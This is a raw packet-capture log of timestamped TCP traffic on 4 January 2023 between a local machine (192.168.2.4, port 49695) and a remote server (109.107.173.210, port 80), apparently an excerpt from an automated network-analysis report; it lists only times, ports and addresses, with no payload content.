Jan 4, 2023 16:47:25.859257936 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859261036 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859283924 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859286070 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859308004 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859311104 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859329939 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859338045 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859358072 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859364986 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859390974 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859397888 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859415054 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859417915 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859441042 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859443903 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859469891 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859472036 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859497070 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859505892 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859522104 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859536886 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859548092 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859555960 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859575987 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859580040 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859601974 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859606981 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859627962 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859630108 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859652996 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859653950 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859673023 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859680891 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859704018 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859707117 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859726906 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859735012 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859755039 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859765053 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859782934 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859791040 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859812975 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859818935 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859837055 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859843969 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859863997 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859870911 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859889984 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859898090 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859918118 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859925985 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859946966 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859975100 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.860117912 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.860146046 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.860177994 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.860204935 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.860236883 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.860265017 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.860327005 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.860336065 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.860363007 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.860388994 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.860394001 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.860416889 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.860433102 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.860445976 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.860466957 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.860476017 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.860493898 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.860506058 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.860517025 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.860532999 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.860537052 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.860559940 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.860588074 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.860595942 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.860614061 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.860622883 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.860646009 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.860673904 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.860675097 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.860702991 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.860707998 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.860732079 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.860760927 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.860776901 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.860776901 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.860793114 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.860807896 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.860824108 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.860837936 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.860853910 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.860857964 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.860882044 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.860888958 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.860909939 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.860939980 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.860946894 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.860969067 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.860986948 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.860999107 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.861011982 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.861030102 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.861041069 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.861057043 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.861074924 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.861088037 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.861116886 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.861120939 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.861120939 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.861148119 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.861167908 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.861180067 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.861228943 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.861269951 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.861850023 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.861881018 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.861910105 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.861938953 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.861965895 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.861973047 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.862004995 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.862842083 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.882318020 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.882380009 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.882406950 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.882431030 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.882456064 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.882467031 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.882483959 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.882510900 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.882517099 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.882545948 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.882549047 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.882575989 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.882581949 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.882601976 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.882608891 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.882627964 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.882632017 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.882653952 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.882657051 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.882679939 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.882685900 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.882714987 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.882719994 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.882735968 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.882747889 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.882772923 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.882797003 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.882802010 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.882822990 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.882841110 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.882848978 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.882874012 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.882898092 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.882901907 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.882944107 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.884268045 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.884304047 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.884335041 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.884363890 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.884392023 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.884394884 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.884419918 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.884428978 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.884448051 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.884463072 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.884480000 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.884495974 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.884509087 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.884533882 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.884537935 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.884567976 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.884568930 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.884596109 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.884601116 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.884618998 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.884629965 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.884648085 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.884660959 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.884675026 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.884690046 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.884706020 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.884721041 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.884735107 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.884768009 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.349646091 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.385807991 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.385891914 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.385929108 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.385963917 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.385998011 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.386017084 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.386034012 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.386043072 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.386069059 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.386070013 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.386105061 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.386111021 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.386136055 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.386142015 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.386156082 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.386174917 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.386197090 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.386225939 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.388079882 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.388123035 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.388156891 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.388190985 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.388205051 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.388226986 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.388247967 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.388262987 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.388297081 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.388328075 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.388330936 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.388350010 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.388372898 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.388382912 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.388408899 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.388433933 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.388443947 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.388463020 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.388478994 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.388494968 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.388514042 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.388531923 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.388547897 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.388566971 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.388582945 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.388602018 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.388617992 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.388638020 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.388652086 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.388669014 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.388686895 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.388704062 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.388722897 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.388740063 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.388775110 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.412134886 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.412184000 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.412219048 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.412254095 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.412288904 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.412328959 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.412364960 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.412399054 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.412434101 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.412463903 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.412468910 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.412504911 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.412513018 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.412538052 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.412542105 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.412576914 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.412578106 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.412599087 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.412614107 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.412647009 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.412648916 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.412668943 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.412686110 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.412707090 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.412719965 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.412740946 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.412755013 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.412775040 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.412790060 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.412808895 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.412825108 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.412844896 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.412879944 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.414567947 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.414613008 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.414652109 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.414664984 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.414695978 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.414710999 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.414717913 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.414758921 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.414769888 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.414799929 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.414813995 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.414839983 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.414851904 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.414880991 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.414891958 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.414921999 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.414933920 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.414963961 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.414973021 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.415004969 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.415013075 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.415045977 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.415057898 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.415086031 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.415096045 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.415126085 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.415138006 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.415168047 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.415189981 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.415209055 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.415241957 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.415249109 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.415263891 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.415290117 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.415302992 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.415329933 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.415345907 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.415369034 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.415385008 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.415407896 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.415422916 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.415447950 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.415462017 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.415488005 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.415504932 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.415528059 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.415541887 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.415566921 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.415586948 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.415610075 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.415621042 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.415652037 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.415690899 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.415729046 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.415766954 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.415783882 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.415806055 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.415844917 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.415863037 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.415884018 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.415903091 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.415925026 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.415941000 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.415965080 CET	80	49695	109.107.173.210	192.168.2.4
